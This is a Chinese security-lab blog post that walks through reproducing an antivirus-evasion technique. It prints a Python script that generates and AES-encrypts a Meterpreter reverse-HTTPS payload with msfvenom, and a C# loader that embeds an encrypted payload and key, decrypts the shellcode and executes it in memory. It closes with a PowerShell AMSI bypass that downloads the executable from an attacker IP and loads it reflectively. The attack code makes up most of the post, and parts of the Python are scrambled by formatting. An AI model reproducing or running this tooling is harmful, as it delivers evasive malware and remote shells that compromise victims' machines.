安全学习方法之上手测试以《Bypass Shellcode-Encryptor》为例

Ms08067安全实验室

发布于 2022-02-10 09:06:01

2970

发布于 2022-02-10 09:06:01

文章被收录于专栏：Ms08067安全实验室Ms08067安全实验室

文章来源｜MS08067 Web漏洞挖掘班第3期

本文作者：Cream（web漏洞挖掘班讲师）

很多人在学习的过程有这样的习惯，将看到的文章收藏起来或者朋友圈转发。

收藏即学习？转发即学会？

当然还是有很多小伙伴会仔细阅读并加以实操研究。学习安全最为重要的就是动手操作，APP漏洞挖掘不上手测试永远学不会，代码不上手敲你永远不知道自己的水平（很菜的那种！），免杀不在实际环境中测试就不清楚它到底能否免杀等等。

总之，实践是检验真理的唯一标准。

每个人都有自己的学习方法，每看到一篇技术文章和大咖体验陈述，我们最好的学习心态是知其然还要知其所以然。这些文章水平有高低之别，对自己是否有帮助因人而异，学习的过程和结果才是最重要的吧。

下面就简单描述自己在学习一篇文章的时所测试基本步骤和思考。（水平有限，见谅）

12月28日Khan安全实验室出了一篇文章《Bypass Shellcode - Encryptor》，最近一直复现和研究各种免杀技术，随即拿过来研究。如有侵权，请告知，感谢。

文中大致思路是利用meterpreter_encryptor.py生成密钥和shellcode，并将插入C#代码中，编译后就可以得到免杀马。

原文链接：

https://mp.weixin.qq.com/s/kGwK4wTOtvlt2W0efXmkiw

其中meterpreter_encryptor.py代码如下：

#!/usr/bin/env python3
import array, base64, random, string
from Crypto.Cipher import AES
from hashlib import sha256
import argparse, subprocess,
os
def main():
  args = parse_args()
  lhost = args.
  lport lhost= args.
  key lport= args.
  keyif not key:
    key = get_random_string(32)
  payload = args.
  method payload= args.
  methodformat = args.format
 
''' generate msfvenom payload '''
  print("[+] Generating MSFVENOM payload...")
  result = subprocess.run(['msfvenom',
    '-p', payload,
    'LPORT=' + lport,
    'LHOST=' + lhost,
#    '-b', '\\x00',
    '-f', 'raw',
    '-o', './msf.bin'],
    capture_output=False)
  f
= open("./msf.bin", "rb")
  buf = f.read()
  f.close()
 
print("[+] key and payload will be written to key.b64 and payload.b64")
 
''' encrypt the payload '''
  print("[+] Encrypting the payload, key=" + key + "...")
  hkey = hash_key(key)
  encrypted = encrypt(hkey, hkey[:16], buf)
  b64 = base64.b64encode(encrypted)
  f
= open("./key.b64", "w")
  f.write(key)
  f.close()
  f
= open("./payload.b64", "w")
  f.write(b64.decode('utf-8'))
  f.close()
 
if format == "b64":
    ''' base64 output '''
    print("[+] Base64 output:")
    print(b64.decode('utf-8'))
    print("\n[+] Have a nice day!")
    return
  if format == "c":
    ''' c output '''
    print("[+] C output:")
    hex_string = 'unsigned char payload[] ={0x';
    hex = '0x'.join('{:02x},'.format(x) for x in encrypted)
    hex_string = hex_string + hex[:-1] + "};"
    print(hex_string)
    print("\n[+] Have a nice day!")
    return

def encrypt(key,iv,plaintext):
  key_length = len(key)
  if (key_length >= 32):
    k = key[:32]
  elif (key_length >= 24):
    k = key[:24]
  else:
    k = key[:16]
  aes
= AES.new(k, AES.MODE_CBC, iv)
  pad_text = pad(plaintext, 16)
  return aes.encrypt(pad_text)

def hash_key(key):
  h = ''
  for c in key:
    h += hex(ord(c)).replace("0x", "")
  h = bytes.fromhex(h)
  hashed = sha256(h).digest()
  return
hashed
def pad(data, block_size):
  padding_size = (block_size - len(data)) %
   block_sizeif padding_size == 0:
    padding_size =
  padding  block_size= (bytes([padding_size]) * padding_size)
  return data +
padding
def parse_args():
  parser = argparse.ArgumentParser()
  parser
.add_argument("-l", "--lport", default="0.0.0.0", type=str,
    help="The local port that msfconsole is listening on.")
  parser.add_argument("-i", "--lhost", default="443", type=str,
      help="The local host that msfconsole is listening on.")
  parser.add_argument("-p", "--payload", default = "windows/x64/meterpreter/reverse_https", type=str,
    help="The payload to generate in msfvenom.")
  parser.add_argument("-m", "--method", default="thread", type=str,
    help="The method to use: thread/delegate.")
  parser.add_argument("-k", "--key", default="", type=str,
    help="The encryption key (32 chars).")
  parser

.add_argument("-f", "--format", default="b64", type=str,
    help="The format to output.")
 
return parser.parse_args()

def get_random_string(length):
  letters = string.ascii_letters + string.
  result_str digits= ''.join(random.choice(letters) for i in range(length))
  return
result_str
if __name__ == '__main__':
  main()

使用方法：

meterpreter_encryptor.py [-h] [-l LPORT] [-i LHOST] [-p PAYLOAD] [-m METHOD] [-k KEY] [-f FORMAT]

-h帮助信息；

-i 会话反弹到哪个地方，攻击机的IP；

-l会话反弹到哪个端口，攻击者的port，不要冲突；

-p 使用的MSF的payload；

-m 执行shellcode后的操作，有thread/delegate；

-k 32 chars的key，可以不用设置，可以随机生成；

-e 编码方式，参考msfvenom的方法；

-f生成的payload类型。

python3 meterpreter_encryptor.py -p windows/x64/meterpreter/reverse_https -i 192.168.11.2 -l 443 -f b64

复制如上生成的key和base64结果放在如下的C#代码中编译生成EXE文件：

using System;
using System.Runtime.InteropServices;
using System.Security.Cryptography;
using System.Text;
using System.IO;
namespace
ProcessInjection
{
    class Program
    {
        public enum Protection
        {
            PAGE_NOACCESS = 0x01,
            PAGE_READONLY = 0x02,
            PAGE_READWRITE = 0x04,
            PAGE_WRITECOPY = 0x08,
            PAGE_EXECUTE = 0x10,
            PAGE_EXECUTE_READ = 0x20,
            PAGE_EXECUTE_READWRITE = 0x40,
            PAGE_EXECUTE_WRITECOPY = 0x80,
            PAGE_GUARD = 0x100,
            PAGE_NOCACHE = 0x200,
            PAGE_WRITECOMBINE = 0x400
        }
       
[DllImport("kernel32.dll")]
        static extern bool VirtualProtect(IntPtr lpAddress, UIntPtr dwSize, uint flNewProtect, out uint lpflOldProtect);
       
[DllImport("kernel32.dll", SetLastError = true, ExactSpelling = true)]
        static extern IntPtr VirtualAllocExNuma(IntPtr hProcess, IntPtr lpAddress, uint dwSize, UInt32 flAllocationType, UInt32 flProtect, UInt32 nndPreferred);
       
private delegate Int32 ShellcodeDelegate();
       
static void Main(string[] args)
        {
            Shellcode();
        }
       
static void Shellcode()
        {
            // attempt heuristics/behaviour bypass
            IntPtr mem = VirtualAllocExNuma(System.Diagnostics.Process.GetCurrentProcess().Handle, IntPtr.Zero, 0x1000, 0x3000, 0x4, 0);
            if (mem == null)
            {
                return;
            }
           
// decrypt the base64 payload - change these to your own encrypted payload and key
            string payload = "6LII6OYoVux8aZ+bY/9SiwDKLvHDFMSQYnr21YRAEe5m6rEjKxqnqHrjpp7X6XZBbrQcwqLnK7K4lXE1xv7PkLP0zPbQujfUxRDlMOKmvoH4DJySgcbBTwGvIey/4EIV4UZY6NCRSu1BVl9ztwAiSltAdoXt68JPFvm4W/V58crjsD8L2InuEmTf7QaGx43CbfBQPsG11KI0ExWpBQ9bdFaTQR1A8CPbLJ+Lx1gjJyDEKoOORrdP+iKdVRgox8kWqUlvEKOg90XienikjaZpeq4npmtg5Cwe0CMBkX688PFxFYtW32up38oFQAUIJ02mhKSHJMqUKbmZ/CHdoh5Vaheuq0XONzmYJ6H4tklqyeET8AszkrwxDebyPDpqnTjuCM4Gamynk0HAn5N2rH4S1KvrTKSTr7kTOa0okDPaYr9cIHtFbYmWW9wgDixkfkiJxD/Kx98F/urzgmnoxxSHKwVPUGQNqJ1vzB04gE0mPLJy1TyaNzgLxvIJRKLHDmpExH2Hd0ieCA8kp2Qwf6yVrM2aeFxChoDEVsHAB97E63O2eM1i+uFmSsR4Ti5P69WfvRinUb6VRLELQLdyg3BKlipcJiabchviL53J9Adqea3P4pAjtjbEELd1mMIA++dxhihcNDZ6zPPswv+M10DyWExWTc1NxJzUFogNYrhj/BumwMR95LA5m4wl8JvVUCGc0OCLPaMUHhdenCJwwFtBrW87lePC9BzFgxJ8gS5eSUF1CMp3hjBdSIE4fp/TQShNrxwrQWXt4gZKcqTkAnt3pdfFE7qkoF8YWormRMxCdVaofwtjow3hJB8+iW01puVl/5GIspKz0ligMoZUnxCRvY/kiqng3z21iO6LrFO2em5ts7/Oh6H4wUaAHFw+/L7/EEN+fR7stKR+kPHsholU5SU/ofCxyGWIvWno647MyNXxRZvbOdIxTLz2c0mJzV+sAiVXDK+B3GbNw6vjQFNHtI2LwW2Fm/uaUyt8qm1zQIJjZi210RTIr9l31nlcwrtH36YhnW/oQcBLBANbmT+MwYMEaU+gCr2Gi+vMmTE828GWwYbJ5rBR4gGT7eP1WP6i";
//这里是生成的payload
            string key = "vzj2WM9NY3oQ4U1KOJF7o15rXdj3YxNn";
//这里是生成的key
            byte[] buf = Decrypt(key, payload);
           
            unsafe
{
                fixed (byte* ptr = buf)
                {
                    // set the memory as executable and execute the function pointer (as a delegate)
                    IntPtr memoryAddress = (IntPtr)ptr;
                    VirtualProtect(memoryAddress, (UIntPtr)buf.Length, (UInt32)Protection.PAGE_EXECUTE_READWRITE, out uint lpfOldProtect);
                   
ShellcodeDelegate func = (ShellcodeDelegate)Marshal.GetDelegateForFunctionPointer(memoryAddress, typeof(ShellcodeDelegate));
                    func();
                }
            }
        }
       
private static byte[] Decrypt(string key, string aes_base64)
        {
            byte[] tempKey = Encoding.ASCII.GetBytes(key);
            tempKey = SHA256.Create().ComputeHash(tempKey);
            byte
[] data = Convert.FromBase64String(aes_base64);
           
// decrypt data
            Aes aes = new AesManaged();
            aes.Mode = CipherMode.CBC;
            aes.Padding = PaddingMode.PKCS7;
            ICryptoTransform dec = aes.CreateDecryptor(tempKey, SubArray(tempKey, 16));
           
using (MemoryStream msDecrypt = new MemoryStream())
            {
                using (CryptoStream csDecrypt = new CryptoStream(msDecrypt, dec, CryptoStreamMode.Write))
                {
                    csDecrypt
.Write(data, 0, data.Length);
                   
return msDecrypt.ToArray();
                }
            }
        }
       
static byte[] SubArray(byte[] a, int length)
        {
            byte[] b = new byte[length];
            for (int i = 0; i < length; i++)
            {
                b[i] = a[i];
            }
            return b;
        }
    }
}

注意：unsafe代码会报错，需要在VS中设置“允许unsafe”代码。

编译成功后就可以生成demo.exe

该demo.exe便是免杀的。可尝试线上测试，效果如下：

将该demo.exe注入到远程powershell进程：

# AMSI bypass
$a = [Ref].Assembly.GetTypes();ForEach($b in $a) {if ($b.Name -like "*iutils") {$c = $b}};$d = $c.GetFields('NonPublic,Static');ForEach($e in $d) {if ($e.Name -like "*itFailed") {$f = $e}};$f.SetValue($null,$true)
$bytes = (Invoke-WebRequest "http://192.168.11.2/demo.exe").Content;
$assembly = [System.Reflection.Assembly]::Load($bytes);
$entryPointMethod = $assembly.GetType('ProcessInjection.Program', [Reflection.BindingFlags] 'Public, NonPublic').GetMethod('Main', [Reflection.BindingFlags] 'Static, Public, NonPublic');
$entryPointMethod.Invoke($null, (, [string[]] ('', '')));

在开启防护的Windows10中执行。